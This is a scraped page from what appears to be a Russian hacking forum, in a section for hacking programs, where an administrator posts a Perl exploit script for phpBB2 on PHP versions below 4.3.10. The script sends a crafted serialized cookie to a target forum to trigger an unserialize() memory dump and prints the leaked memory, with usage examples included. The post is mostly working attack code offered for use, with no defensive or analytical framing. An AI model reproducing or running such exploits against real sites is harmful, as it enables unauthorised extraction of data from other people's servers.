06:33
Обновить
Simple phpbb2 + php version < 4.3.10 unserialize() memory du - Форум
| RSS



[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: aka_kludge, LeadyTOR 
Форум » взЛОм » ПроГраММы для взлома » Simple phpbb2 + php version < 4.3.10 unserialize() memory du
Simple phpbb2 + php version < 4.3.10 unserialize() memory du
aka_kludgeДата: Четверг, 29.10.2009, 22:27 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
Code
#!/usr/bin/perl

#
# Simple phpbb2 + php version < 4.3.10 unserialize() memory dump sql sploit
# Based on http://www.securitylab.ru/_Exploits/2004/12/phpbb+php.c.txt

# (c) Cyber Lords Community http://www.cyberlords.net

# Usage: perl spl.pl host phpbb_dir

# Example:  ./spl.pl forum.ru /phpbb/
# Example#2: /spl.pl forum.ru /phpbb/ | strings | awk -F"\n" 'BEGIN{s=0}{s=s+1;printf "string %i:    %s\n",s,$1}'
#
#

use Socket;
use IO::Handle;

my $host=@ARGV[0];
my $dir=@ARGV[1];

socket(SOCK,AF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "socket() failed: $!\n";
connect(SOCK,sockaddr_in(80,inet_aton($host)));
SOCK->autoflush(1);

my $q=qq{GET $dir HTTP/1.1
HOST: $host
Cookie: phpbb2mysql_data=s:400000:%22test1%22%3b; expires=Fri, 24-Dec-2005 21:25:37 GMT;
Cookie: phpbb2mysql_sid=1cfd759c33ba3a45b994c7b7cfd948ec; path=/;
Accept-Language: ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close

};

print SOCK $q;

my $all_data,$data,$s;

while(sysread(SOCK,$data,1024)){
$all_data.=$data;
}

while($all_data=~/\%([A-Z0-9]{2})/) {
     $s=pack('H8', $1);
     $all_data=~s/\%$1/$s/g;
}

print $all_data;
close SOCK;
 
Форум » взЛОм » ПроГраММы для взлома » Simple phpbb2 + php version < 4.3.10 unserialize() memory du
Страница 1 из 11
Поиск:

Профиль
ИнформацияУправление
Сегодня: 24, 24.09.2017, 06:33
Вы используете: " v "
ВаШ внешний IP: "54.224.49.217"
У вас новых личных сообщений · Мой профиль | Выход




    Главная      
...
На службе : дней

06:33
Обновить


Пользователи
aka_kludge
qwerty
LeadyTOR
aka_Atlantis
AdHErENt
mAss
Sissutr
hiss
DrBio
tHick

Поиск

...



Друзья сайта

ГеоИнфоКом


Miranda Инфо

Метеориты

Остаться в живых - LOST. Лучший сайт сериала.

Метеориты

Hackersoft

hackings.ru

Схемы дл<a href=


Обмен cсылками
ITbuben - IT-шные блоги, сообщества, Windows, Linux, Web, Программирование, Интернет, Юмор, Софт


Copyright tHR - TeAM 2017 г. admin: aka_kludge (ICQ:334449009) Moderator's: LeadyTOR, HanaBi ... Яндекс.Метрика